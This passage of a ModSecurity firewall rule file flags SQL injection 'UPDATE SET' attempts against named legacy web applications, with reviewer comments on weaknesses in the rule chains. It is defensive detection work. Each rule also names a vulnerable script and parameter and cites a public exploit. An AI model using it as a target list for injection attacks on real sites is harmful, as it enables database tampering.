Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE 
"@contains GET " "chain" SecRule REQUEST_LINE "@contains type=query&" "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RJ-iTop Network Vulnerabilities Scan System id UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003822) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RunCms SQL Injection Attempt -- debug_show.php executed_queries UPDATE SecRule REQUEST_LINE "@contains /class/debug/debug_show.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003822,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS RunCms SQL Injection Attempt -- debug_show.php executed_queries UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3850'" SecRule &TX:'/SQL_INJECTION.*ARGS:executed_queries/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RunCms SQL Injection Attempt -- debug_show.php executed_queries UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003863) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS RunawaySoft Haber portal 1.0 SQL Injection Attempt -- devami.asp id UPDATE SecRule REQUEST_LINE "@contains /devami.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003863,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS RunawaySoft Haber portal 1.0 SQL Injection Attempt -- devami.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3936'" SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS RunawaySoft Haber portal 1.0 SQL Injection Attempt -- devami.asp id 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004468) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SalesCart Shopping Cart SQL Injection Attempt -- reorder2.asp UPDATE SecRule REQUEST_LINE "@contains /cgi-bin/reorder2.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004468,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SalesCart Shopping Cart SQL Injection Attempt -- reorder2.asp UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/2.2.8'" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SalesCart Shopping Cart SQL Injection Attempt -- reorder2.asp UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004498) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name UPDATE SecRule REQUEST_LINE "@contains /add2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004498,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22820'" SecRule &TX:'/SQL_INJECTION.*ARGS:name/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php name UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004504) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country UPDATE SecRule REQUEST_LINE "@contains /add2.php" 
"chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004504,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22820'" SecRule &TX:'/SQL_INJECTION.*ARGS:country/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php country UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004510) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email UPDATE SecRule REQUEST_LINE "@contains /add2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004510,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22820'" SecRule &TX:'/SQL_INJECTION.*ARGS:email/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php email UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004516) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website UPDATE SecRule REQUEST_LINE "@contains /add2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004516,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22820'" SecRule &TX:'/SQL_INJECTION.*ARGS:website/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET 
WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php website UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004522) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message UPDATE SecRule REQUEST_LINE "@contains /add2.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004522,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22820'" SecRule &TX:'/SQL_INJECTION.*ARGS:message/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Savas Guestbook SQL Injection Attempt -- add2.php message UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2011730) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SchoolMation studentmain.php session Parameter UPDATE SET SQL Injection Attempt SecRule REQUEST_LINE "@contains /html/studentmain.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011730,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS SchoolMation studentmain.php session Parameter UPDATE SET SQL Injection Attempt',tag:'web-application-attack',tag:'bugtraq,40737'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/SQL_INJECTION.*ARGS:session/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SchoolMation studentmain.php session Parameter UPDATE SET SQL Injection Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004121) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ScriptMagix Jokes SQL 
Injection Attempt -- index.php catid UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004121,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ScriptMagix Jokes SQL Injection Attempt -- index.php catid UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3509'" SecRule &TX:'/SQL_INJECTION.*ARGS:catid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ScriptMagix Jokes SQL Injection Attempt -- index.php catid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2006314) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ScriptMate User Manager SQL Injection Attempt -- usermessages.asp mesid UPDATE SecRule REQUEST_LINE "@contains /utilities/usermessages.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006314,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ScriptMate User Manager SQL Injection Attempt -- usermessages.asp mesid UPDATE',tag:'web-application-attack',tag:'url,www.secunia.com/advisories/23372'" SecRule &TX:'/SQL_INJECTION.*ARGS:mesid/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ScriptMate User Manager SQL Injection Attempt -- usermessages.asp mesid UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2004420) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Serendipity SQL Injection Attempt -- index.php serendipity UPDATE SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004420,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Serendipity SQL Injection Attempt -- index.php serendipity 
UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/archive/1/archive/1/461671/100/0/threaded'" SecRule REQUEST_LINE "@contains serendipity[multiCat][" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Serendipity SQL Injection Attempt -- index.php serendipity UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2005795) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS ShopStoreNow E-commerce Shopping Cart SQL Injection Attempt -- orange.asp CatID UPDATE SecRule REQUEST_LINE "@contains /orange.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005795,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS ShopStoreNow E-commerce Shopping Cart SQL Injection Attempt -- orange.asp CatID UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/21905'" SecRule &TX:'/SQL_INJECTION.*ARGS:CatID/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS ShopStoreNow E-commerce Shopping Cart SQL Injection Attempt -- orange.asp CatID UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'" # (2003857) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SimpNews SQL Injection Attempt -- print.php newsnr UPDATE SecRule REQUEST_LINE "@contains /print.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003857,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SimpNews SQL Injection Attempt -- print.php newsnr UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3942'" SecRule &TX:'/SQL_INJECTION.*ARGS:newsnr/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SimpNews SQL Injection Attempt -- print.php newsnr 
UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): each rule here is a two-link chain. Link one is a case-sensitive
# @contains on REQUEST_LINE (no t:lowercase in its t: list); link two counts TX
# variables whose name matches /SQL_INJECTION.*ARGS:<param>/ and, when at least
# one exists, adds tx.critical_anomaly_score to tx.anomaly_score.
# Nothing fires unless an earlier rule has stored such a TX variable (presumably
# the generic SQL injection rules; confirm they are loaded and run first).
# (2004784) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Simple PHP Forum SQL Injection Attempt -- logon_user.php username UPDATE
SecRule REQUEST_LINE "@contains /logon_user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004784,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Simple PHP Forum SQL Injection Attempt -- logon_user.php username UPDATE',tag:'web-application-attack',tag:'cve,CVE-2006-7088'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:username/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Simple PHP Forum SQL Injection Attempt -- logon_user.php username UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004790) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Simple PHP Forum SQL Injection Attempt -- update_profile.php username UPDATE
SecRule REQUEST_LINE "@contains /update_profile.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004790,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Simple PHP Forum SQL Injection Attempt -- update_profile.php username UPDATE',tag:'web-application-attack',tag:'cve,CVE-2006-7088'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:username/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Simple PHP Forum SQL Injection Attempt -- update_profile.php username UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005876) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Simple Web Content Management System SQL Injection Attempt -- page.php id UPDATE
SecRule REQUEST_LINE "@contains /page.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005876,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Simple Web Content Management System SQL Injection Attempt -- page.php id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3076'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Simple Web Content Management System SQL Injection Attempt -- page.php id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the TX selector regexes are not end-anchored, so ARGS:ps, ARGS:us
# and ARGS:f also match variables recorded for longer argument names that merely
# start with those letters. The four index.php rules that follow share the
# generic /index.php path match, so the product named in msg is an attribution
# hint, not a confirmed target.
# (2005523) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php ps UPDATE
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005523,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php ps UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0221'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:ps/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php ps UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005529) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php us UPDATE
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005529,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php us UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0221'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:us/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php us UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005535) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php f UPDATE
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005535,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php f UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0221'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:f/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php f UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005541) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php code UPDATE
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005541,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php code UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0221'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:code/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- index.php code UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005547) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php code UPDATE
SecRule
REQUEST_LINE "@contains /dl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005547,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php code UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0221'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:code/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php code UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): each rule here is a chain. Link one is a case-sensitive @contains
# on REQUEST_LINE (no t:lowercase in its t: list). The last link either counts TX
# variables whose name matches /SQL_INJECTION.*ARGS:<param>/ or runs an
# UPDATE...SET regex; on a full match tx.critical_anomaly_score is added to
# tx.anomaly_score and part E is added to the audit log.
# The TX-count links depend on an earlier rule having stored a matching TX
# variable (presumably the generic SQL injection rules; confirm load order), and
# their regexes are not end-anchored, so short names such as f, us, ps or id also
# match variables recorded for longer argument names with that prefix.
# (2005553) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php f UPDATE
SecRule REQUEST_LINE "@contains /dl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005553,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php f UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0221'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:f/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php f UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005559) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php us UPDATE
SecRule REQUEST_LINE "@contains /dl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005559,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php us UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0221'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:us/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php us UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2005566) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php ps UPDATE
SecRule REQUEST_LINE "@contains /dl.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005566,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php ps UPDATE',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/0221'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:ps/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS SmE FileMailer SQL Injection Attempt -- dl.php ps UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): the .asp path operands in this run are compared case-sensitively.
# If the protected server resolves paths case-insensitively (likely for .asp
# hosts, TODO confirm), consider t:lowercase with a lowercase operand.
# (2004868) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE
SecRule REQUEST_LINE "@contains /pop_profile.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004868,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3321'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:id/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Snitz Forums 2000 SQL Injection Attempt -- pop_profile.asp id UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2006134) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Softwebs Nepal Ananda Real Estate SQL Injection Attempt -- list.asp agent UPDATE
SecRule REQUEST_LINE "@contains /list.asp" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006134,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Softwebs Nepal Ananda Real Estate SQL Injection Attempt -- list.asp agent UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3001'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:agent/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Softwebs Nepal Ananda Real Estate SQL Injection Attempt -- list.asp agent UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# NOTE(review): this rule does not use the TX-count link. Its regex link has no
# t: actions of its own, is not tied to any parameter, and requires at least one
# character before UPDATE; any query string or body on this path that contains
# "update ... set" text will score. Confirm which transformations apply to it.
# (2006485) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php UPDATE
SecRule REQUEST_LINE "@contains /game_listing.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2006485,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/4078'"
    SecRule QUERY_STRING|REQUEST_BODY "(?i:.+UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Solar Empire SQL Injection Attempt -- game_listing.php UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004384) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Triexa SonicMailer Pro SQL Injection Attempt -- index.php list UPDATE
SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2004384,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Triexa SonicMailer Pro SQL Injection Attempt -- index.php list UPDATE',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/3457'"
    SecRule &TX:'/SQL_INJECTION.*ARGS:list/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Triexa SonicMailer Pro SQL Injection Attempt -- index.php list UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/SQL_INJECTION-%{matched_var_name}=%{matched_var}'"

# (2004821) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Sphider SQL Injection Attempt -- search.php category UPDATE
